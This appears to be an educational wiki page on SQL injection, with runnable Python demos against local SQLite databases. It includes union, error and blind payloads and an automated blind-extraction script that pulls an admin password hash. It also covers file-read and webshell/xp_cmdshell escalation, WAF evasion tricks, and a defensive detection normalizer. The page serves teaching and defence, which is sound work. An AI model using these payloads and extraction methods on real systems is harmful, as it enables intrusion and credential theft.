SQL Injection
Category: Web
MITRE ATT&CK: Initial Access / Execution — T1190 (Exploit Public-Facing Application)
Related: Web Application Testing, Xss, Privilege Escalation Linux
Overview
SQL Injection (SQLi) occurs when attacker-controlled input is incorporated into SQL queries without proper sanitization or parameterization. It is consistently ranked in the OWASP Top 10 and can result in data exfiltration, authentication bypass, and in some cases OS-level code execution.
How It Works
Types
- In-band (classic): results come back in the HTTP response. Subtypes:
  - Error-based: verbose DB error messages leak schema or data.
  - Union-based: `UNION SELECT` appends attacker-chosen rows to the result set (the column count must match the original query and the types must be compatible).
- Blind: no query output is visible; data is inferred from application behaviour.
  - Boolean-based: the response differs for true vs. false injected conditions.
  - Time-based: `SLEEP()` / `WAITFOR DELAY` make the response time encode truth.
- Out-of-band: data is exfiltrated through DNS/HTTP requests that the DB server itself makes to an attacker-controlled host (`xp_dirtree` on MSSQL, `LOAD_FILE()` with a UNC path on MySQL).
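The in-band and blind variants above, exercised against a throwaway SQLite database so they can be run offline. This is an added example, not code from the original page: the schema, sample rows, payload constants and function names are constructed for illustration. It also shows the hardened forms beside the vulnerable one (a bound parameter for the value, and an allow-list for a user-chosen `ORDER BY` column, which a placeholder cannot bind).

```python
import sqlite3

# Constructed in-memory database standing in for the target's DB (example schema and rows).
def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price REAL);
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT);
        INSERT INTO products VALUES (1, 'widget', 9.99), (2, 'gadget', 19.99);
        INSERT INTO users VALUES (1, 'admin', 'sha256$deadbeef'), (2, 'bob', 'sha256$cafef00d');
    """)
    return conn


def vulnerable_search(conn: sqlite3.Connection, term: str) -> list:
    """Deliberately vulnerable: the input is spliced into the SQL text."""
    sql = "SELECT name, price FROM products WHERE name = '" + term + "'"
    return conn.execute(sql).fetchall()


def safe_search(conn: sqlite3.Connection, term: str) -> list:
    """Hardened: the value is bound to a placeholder and can never change the query structure."""
    return conn.execute("SELECT name, price FROM products WHERE name = ?", (term,)).fetchall()


# Placeholders cannot bind identifiers, so a user-chosen sort column must be allow-listed.
ALLOWED_SORT_COLUMNS = ("name", "price")


def safe_sorted_products(conn: sqlite3.Connection, sort_col: str) -> list:
    """Hardened identifier handling: only a known column name ever reaches the SQL text."""
    if sort_col not in ALLOWED_SORT_COLUMNS:
        raise ValueError("unsupported sort column")
    return conn.execute("SELECT name, price FROM products ORDER BY " + sort_col).fetchall()


# In-band, union-based: the original SELECT has two columns, so the appended SELECT needs two;
# the trailing -- comments out the application's closing quote.
UNION_PAYLOAD = "x' UNION SELECT username, password_hash FROM users--"

# In-band, error-based probe: a lone quote leaves the string literal unterminated.
ERROR_PROBE = "'"


def boolean_payload(condition: str) -> str:
    """Blind, boolean-based: the known row comes back only when the injected condition is true."""
    return "widget' AND (" + condition + ")--"


def db_error(conn: sqlite3.Connection, payload: str) -> str:
    """Error text the vulnerable query produces for a payload, or '' when it runs cleanly."""
    try:
        vulnerable_search(conn, payload)
        return ""
    except sqlite3.Error as exc:
        return str(exc)


if __name__ == "__main__":
    db = build_db()
    print(vulnerable_search(db, UNION_PAYLOAD))   # rows from the users table, not products
    print(safe_search(db, UNION_PAYLOAD))         # [] : the payload is just a product name that does not exist
    print(db_error(db, ERROR_PROBE))              # SQLite syntax error text (error-based channel)
    print(vulnerable_search(db, boolean_payload("substr(sqlite_version(),1,1)='3'")))
```

The same `UNION_PAYLOAD` that dumps `users` through `vulnerable_search` returns nothing through `safe_search`, because the driver sends it as a literal value. `safe_sorted_products` is the part parameterization cannot cover: a column name is an identifier, so the only defense is to compare it against a fixed list before it touches the query text.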
Common DB-Specific Tricks
| DB | Version Query | Sleep | File Read |
|---|---|---|---|
| MySQL | SELECT @@version | SLEEP(5) | LOAD_FILE('/etc/passwd') |
| MSSQL | SELECT @@version | WAITFOR DELAY '0:0:5' | OPENROWSET |
| PostgreSQL | SELECT version() | pg_sleep(5) | COPY TO/FROM |
| Oracle | SELECT banner FROM v$version | dbms_pipe.receive_message('a',5) | UTL_FILE |
| SQLite | SELECT sqlite_version() | n/a | n/a |
Privilege Escalation via SQLi
- MySQL: `FILE` privilege → `SELECT ... INTO OUTFILE` to write a webshell into the web root (blocked if `secure_file_priv` restricts the target directory).
- MSSQL: `xp_cmdshell` (disabled by default; enabling it via `sp_configure` needs sysadmin) → OS command execution.
- PostgreSQL: `COPY ... FROM PROGRAM` (requires superuser or the `pg_execute_server_program` role) → OS command execution.
Attack Methodology
- Identify injection points: GET/POST params, cookies, headers (User-Agent, Referer, X-Forwarded-For), JSON/XML bodies.
- Probe with `'`, `"`, `\`, `)`; look for errors or behavioural changes.
- Determine injection type (in-band vs. blind).
- Map DB: version, current user, current DB, list of tables.
- Extract target data (credentials, PII, sensitive tables).
- Escalate if DB user has elevated privileges (FILE, xp_cmdshell).
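The methodology above as one end-to-end run against a simulated boolean-blind endpoint. This is an added example, not code from the original page: the `Target` class, the schema and the data are constructed, and the endpoint deliberately swallows DB errors and returns only found/not-found so that the blind path is the only one available. It goes beyond the list by showing the binary search over character code points that automated tools use to keep the request count down (seven requests per character instead of up to 127 linear guesses).

```python
import sqlite3

# Constructed target: an in-memory SQLite DB standing in for the application's database.
def build_target() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT);
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT);
        INSERT INTO products VALUES (1, 'widget'), (2, 'gadget');
        INSERT INTO users VALUES (1, 'admin', 'sha256$deadbeef');
    """)
    return conn


class Target:
    """Simulated vulnerable endpoint: answers only found/not-found and hides DB errors,
    so the only usable channel is boolean-based blind."""

    def __init__(self, conn: sqlite3.Connection):
        self.conn = conn
        self.requests = 0

    def page(self, q: str) -> bool:
        self.requests += 1
        sql = "SELECT 1 FROM products WHERE name = '" + q + "'"   # deliberately vulnerable
        try:
            return self.conn.execute(sql).fetchone() is not None
        except sqlite3.Error:
            return False   # generic error page: no error-based channel


def cond(expr: str) -> str:
    """Wrap a SQL condition so the page's found/not-found answer reports its truth."""
    return "widget' AND (" + expr + ")--"


def extract(t: Target, expr: str, max_len: int = 64) -> str:
    """Boolean-blind extraction of a string expression, one character at a time, each found
    by binary search over its code point (assumes ASCII output)."""
    out = ""
    for pos in range(1, max_len + 1):
        if not t.page(cond(f"length({expr}) >= {pos}")):
            break                                    # past the end of the string
        lo, hi = 0, 127
        while lo < hi:                               # invariant: code point is in [lo, hi]
            mid = (lo + hi) // 2
            if t.page(cond(f"unicode(substr({expr}, {pos}, 1)) > {mid}")):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


def run_methodology(t: Target) -> dict:
    r = {}
    # 1-2. Identify the injection point and probe it: a lone quote changes the response.
    r["baseline"] = t.page("widget")                 # True: normal lookup
    r["quote"] = t.page("widget'")                   # False: the broken query was swallowed
    # 3. Determine the type: no output and no error text, but true/false conditions differ.
    r["true_cond"] = t.page(cond("1=1"))
    r["false_cond"] = t.page(cond("1=2"))
    # 4. Map the DB: version and table list (sqlite_master is SQLite's catalog).
    r["version"] = extract(t, "sqlite_version()")
    r["tables"] = extract(t, "(SELECT group_concat(name) FROM sqlite_master WHERE type = 'table')")
    # 5. Extract the target data.
    r["admin_hash"] = extract(t, "(SELECT password_hash FROM users WHERE username = 'admin')")
    # 6. Escalation depends on DB privileges (FILE, xp_cmdshell, COPY FROM PROGRAM); SQLite has none.
    r["requests"] = t.requests
    return r


if __name__ == "__main__":
    target = Target(build_target())
    for key, value in run_methodology(target).items():
        print(f"{key}: {value}")
```

Against a real application the `page()` call is an HTTP request and the true/false decision is whatever distinguishes the two responses (status code, a string in the body, content length). Note the request count in the result: every character costs about eight requests, which is the timing and volume artifact the detection notes below refer to.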
Detection & Evasion Notes
- WAFs block common keywords (`UNION`, `SELECT`, `--`).
- Evasion: MySQL version-comment variants (`/*!UNION*/`), case mixing (`SeLeCt`), URL/double encoding, whitespace alternatives (`%09`, `%0a`, `/**/`), HTTP parameter pollution.
- Blind SQLi is harder to spot in application output; time-based injection still leaves timing artifacts (unusually slow requests) in logs, and boolean-based extraction leaves a high volume of near-identical requests.
- Parameterized queries / prepared statements are the primary defense for values. They cannot bind identifiers (table or column names, `ORDER BY` targets), which must be allow-listed; input validation and least-privilege DB accounts limit impact but do not replace parameterization.
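A normalizer that reverses the evasions listed above before signature matching, run over constructed request lines. This is an added example, not code from the original page or from any WAF product: the sample requests, the `SIGNATURES` patterns and the function names are illustrative. The parameter-pollution line assumes a backend that concatenates duplicate parameters so that a comment can bridge them; the naive filter shows what a single-decode literal match misses.

```python
import re
from urllib.parse import unquote

# Constructed request lines (query strings as they would appear in an access log), not real traffic.
SAMPLE_REQUESTS = [
    "/item?id=5",                                          # benign
    "/item?id=5%20UNION%20SELECT%201,2,3--",               # plain union
    "/item?id=5%20/*!UNION*/%20/*!SELECT*/%201,2--",       # MySQL version comments
    "/item?id=5%2520UnIoN%2520SeLeCt%25201,2--",           # double encoding + case mixing
    "/item?id=5%09union%0aselect%091,2--",                 # tab/newline instead of spaces
    "/item?id=1%20UNION/*&id=*/SELECT%201,2--",            # parameter pollution bridged by a comment
    "/login?user=admin'%20OR%20'1'='1",                    # tautology after quote breakout
    "/search?q=select%20a%20chair",                        # benign use of a keyword
]

# Illustrative signatures applied to the normalized text.
SIGNATURES = [
    re.compile(r"\bunion\s+(all\s+)?select\b"),
    re.compile(r"'\s*(or|and)\b"),
    re.compile(r"\b(sleep|pg_sleep|benchmark)\s*\("),
    re.compile(r"\bwaitfor\s+delay\b"),
]


def normalize(raw: str) -> str:
    """Undo the listed evasions: decode up to twice, expand MySQL /*!...*/ comments,
    drop other comments, collapse each whitespace run to one space, lowercase."""
    s = raw
    for _ in range(2):                       # second pass catches double encoding
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    s = re.sub(r"/\*!\s*(.*?)\s*\*/", r" \1 ", s)   # /*!UNION*/ -> UNION (MySQL executes it)
    s = re.sub(r"/\*.*?\*/", " ", s)                 # /**/ and comment bridges -> whitespace
    s = re.sub(r"\s+", " ", s)                       # tabs, newlines, runs of spaces -> one space
    return s.lower()


def naive_match(raw: str) -> bool:
    """What a simple filter does: decode once and look for the literal phrase."""
    return "union select" in unquote(raw).lower()


def normalized_match(raw: str) -> bool:
    text = normalize(raw)
    return any(p.search(text) for p in SIGNATURES)


def scan(requests) -> list:
    """(request, flagged by the naive filter, flagged after normalization) for each line."""
    return [(r, naive_match(r), normalized_match(r)) for r in requests]


if __name__ == "__main__":
    for line, naive, normalized in scan(SAMPLE_REQUESTS):
        print(f"naive={naive!s:5} normalized={normalized!s:5} {line}")
```

Only the plain payload trips the naive filter; every evasion variant gets through it and is caught once the request is canonicalized. The benign `select a chair` is not flagged because the signatures look for query structure (`union ... select`, a quote followed by `or`/`and`) rather than bare keywords, which is also why keyword-only blocking produces both the bypasses and the false positives.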
Tools
- `sqlmap`: full-featured automated SQLi exploitation (`--level`, `--risk`, `--tamper`)
- `ghauri`: modern sqlmap alternative with better WAF evasion
- Burp Suite Repeater / Intruder: manual testing
- `SQLMate`: quick fingerprinting
References
- OWASP SQL Injection — owasp.org
- PortSwigger SQL Injection Labs
- PayloadsAllTheThings SQLi cheatsheet
